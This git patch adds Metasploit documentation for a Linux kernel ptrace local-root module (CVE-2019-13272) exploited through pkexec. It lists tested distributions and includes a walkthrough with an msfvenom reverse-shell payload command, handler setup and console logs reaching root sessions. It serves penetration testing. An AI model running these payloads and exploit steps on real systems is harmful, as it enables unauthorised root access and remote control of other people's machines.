From 415caafabe33c7eee5a9f7ddfe066984c1a2c8a8 Mon Sep 17 00:00:00 2001 From: Tim W Date: Tue, 3 Sep 2019 17:48:29 +0800 Subject: [PATCH] add docs --- .../linux/local/pkexec_helper_ptrace.md | 170 ++++++++++++++++++ 1 file changed, 170 insertions(+) create mode 100644 documentation/modules/exploit/linux/local/pkexec_helper_ptrace.md diff --git a/documentation/modules/exploit/linux/local/pkexec_helper_ptrace.md b/documentation/modules/exploit/linux/local/pkexec_helper_ptrace.md new file mode 100644 index 0000000000..41e8cd184f --- /dev/null +++ b/documentation/modules/exploit/linux/local/pkexec_helper_ptrace.md @@ -0,0 +1,170 @@ +## Vulnerable Application + +In the Linux kernel before 5.1.17, ptrace_link in kernel/ptrace.c mishandles +the recording of the credentials of a process that wants to create a ptrace +relationship, which allows local users to obtain root access by leveraging +certain scenarios with a parent-child process relationship, where a parent drops +privileges and calls execve (potentially allowing control by an attacker). One +contributing factor is an object lifetime issue (which can also cause a panic). +Another contributing factor is incorrect marking of a ptrace relationship as +privileged, which is exploitable through (for example) Polkit's pkexec helper +with PTRACE_TRACEME. NOTE: SELinux deny_ptrace might be a usable workaround in +some environments. + + This module has been tested successfully on: + * Ubuntu 16.04.5 kernel 4.15.0-29-generic + * Ubuntu 18.04.1 kernel 4.15.0-20-generic + * Ubuntu 19.04 kernel 5.0.0-15-generic + * Ubuntu Mate 18.04.2 kernel 4.18.0-15-generic + * Linux Mint 17.3 kernel 4.4.0-89-generic + * Linux Mint 18.3 kernel 4.13.0-16-generic + * Linux Mint 19 kernel 4.15.0-20-generic + * Xubuntu 16.04.4 kernel 4.13.0-36-generic + * ElementaryOS 0.4.1 4.8.0-52-generic + * Backbox 6 kernel 4.18.0-21-generic + * Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64 + * Kali kernel 4.19.0-kali5-amd64 + * Redcore 1806 (LXQT) kernel 4.16.16-redcore + * MX 18.3 kernel 4.19.37-2~mx17+1 + * RHEL 8.0 kernel 4.18.0-80.el8.x86_64 + * Debian 9.4.0 kernel 4.9.0-6-amd64 + * Debian 10.0.0 kernel 4.19.0-5-amd64 + * Devuan 2.0.0 kernel 4.9.0-6-amd64 + * SparkyLinux 5.8 kernel 4.19.0-5-amd64 + * Fedora Workstation 30 kernel 5.0.9-301.fc30.x86_64 + * Manjaro 18.0.3 kernel 4.19.23-1-MANJARO + * Mageia 6 kernel 4.9.35-desktop-1.mga6 + * Antergos 18.7 kernel 4.17.6-1-ARCH + +## Verification Steps + + 1. Start msfconsole + 1. Get a shell or meterpreter session on the target + 1. Do: `use exploit/linux/local/pkexec_helper_ptrace` + 1. Do: `set session #` + 1. Do: `exploit` + +## Options + + **WritableDir** + + A folder we can write files to. Defaults to `/tmp` + + **COMPILE** + + If we should live compile on the system, or drop pre-created binaries. Auto will determine if gcc/libs are installed to compile live on the system. Defaults to `Auto` + +## Scenarios + +### Ubuntu 18.04 (with Linux 4.15.0-13-generic) + +#### Initial Access + +We need to gain an initial session on the target system before we can use this module. +Additionally this module will only work from a GUI session, and will fail with an SSH session. +In order to gain a compatible session we will upload a payload binary and run it from gnome-terminal. + +``` +# Create a payload binary +msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f elf -o binary + +# Start a handler +msfconsole +msf5 > use exploit/multi/handler +msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp +payload => linux/x64/meterpreter/reverse_tcp +msf5 exploit(multi/handler) > set LHOST 192.168.56.1 +LHOST => 192.168.56.1 +msf5 exploit(multi/handler) > set LPORT 4444 +LPORT => 4444 +msf5 exploit(multi/handler) > run + +[*] Started reverse TCP handler on 192.168.56.1:4444 + +# Execute the payload using gnome-terminal on the target + +[*] Sending stage (3021284 bytes) to 192.168.56.7 +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.7:33244) at 2019-09-03 17:42:17 +0800 + +meterpreter > background + +``` + +#### Escalate + +In this scenario, gcc is installed so we can live compile on the system. + +``` +msf5 exploit(multi/handler) > use exploit/linux/local/pkexec_helper_ptrace +msf5 exploit(linux/local/pkexec_helper_ptrace) > set LHOST 192.168.56.1 +LHOST => 192.168.56.1 +msf5 exploit(linux/local/pkexec_helper_ptrace) > set SESSION 1 +SESSION => 1 +msf5 exploit(linux/local/pkexec_helper_ptrace) > set VERBOSE true +VERBOSE => true +msf5 exploit(linux/local/pkexec_helper_ptrace) > exploit +[*] Started reverse TCP handler on 192.168.56.1:4444 +[+] Kernel version 4.15.0-13-generic appears to be vulnerable +[+] pkexec is installed +[*] Writing '/tmp/.zacecz' (285 bytes) ... +[+] gcc is installed +[*] Live compiling exploit on system... +[*] Writing '/tmp/.fmrefxhjjcq.c' (9718 bytes) ... +[*] Executing exploit '/tmp/.fmrefxhjjcq' +[*] Transmitting intermediate stager...(126 bytes) +[*] Sending stage (3021284 bytes) to 192.168.56.7 +[*] Exploit result: +Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272) +[.] Checking environment ... +[!] Warning: $XDG_SESSION_ID is not set +[!] Warning: Could not find active PolKit agent +[~] Done, looks good +[.] Searching for known helpers ... +[~] Found known helper: /usr/lib/gnome-settings-daemon/gsd-backlight-helper +[.] Using helper: /usr/lib/gnome-settings-daemon/gsd-backlight-helper +[.] Spawning suid process (/usr/bin/pkexec) ... +[.] Tracing midpid ... +[~] Attached to midpid +[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.7:58270) at 2019-09-03 17:29:57 +0800 +meterpreter > getuid +Server username: uid=0, gid=0, euid=0, egid=0 +``` + +#### Escalate w/ pre-compiled binaries + +It is possible to force pre-compiled binaries, in a scenario where `build-essential` or `gcc` aren't on the system. + +``` +msf5 exploit(multi/handler) > use exploit/linux/local/pkexec_helper_ptrace +msf5 exploit(linux/local/pkexec_helper_ptrace) > set LHOST 192.168.56.1 +LHOST => 192.168.56.1 +msf5 exploit(linux/local/pkexec_helper_ptrace) > set SESSION 1 +SESSION => 1 +msf5 exploit(linux/local/pkexec_helper_ptrace) > set COMPILE False +COMPILE => False +msf5 exploit(linux/local/pkexec_helper_ptrace) > run + +[*] Started reverse TCP handler on 192.168.56.1:4444 +[+] Kernel version 4.15.0-13-generic appears to be vulnerable +[+] pkexec is installed +[*] Writing '/tmp/.yaamzkukaml' (285 bytes) ... +[*] Dropping pre-compiled exploit on system... +[*] Writing '/tmp/.wtoplrisgzzo' (51200 bytes) ... +[*] Executing exploit '/tmp/.wtoplrisgzzo' +[*] Transmitting intermediate stager...(126 bytes) +[*] Sending stage (3021284 bytes) to 192.168.56.7 +[*] Exploit result: +Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272) +[.] Checking environment ... +[!] Warning: $XDG_SESSION_ID is not set +[!] Warning: Could not find active PolKit agent +[~] Done, looks good +[.] Searching for known helpers ... +[~] Found known helper: /usr/lib/gnome-settings-daemon/gsd-backlight-helper +[.] Using helper: /usr/lib/gnome-settings-daemon/gsd-backlight-helper +[.] Spawning suid process (/usr/bin/pkexec) ... +[.] Tracing midpid ... +[~] Attached to midpid +[*] Meterpreter session 3 opened (192.168.56.1:4444 -> 192.168.56.7:58272) at 2019-09-03 17:30:16 +0800 +``` +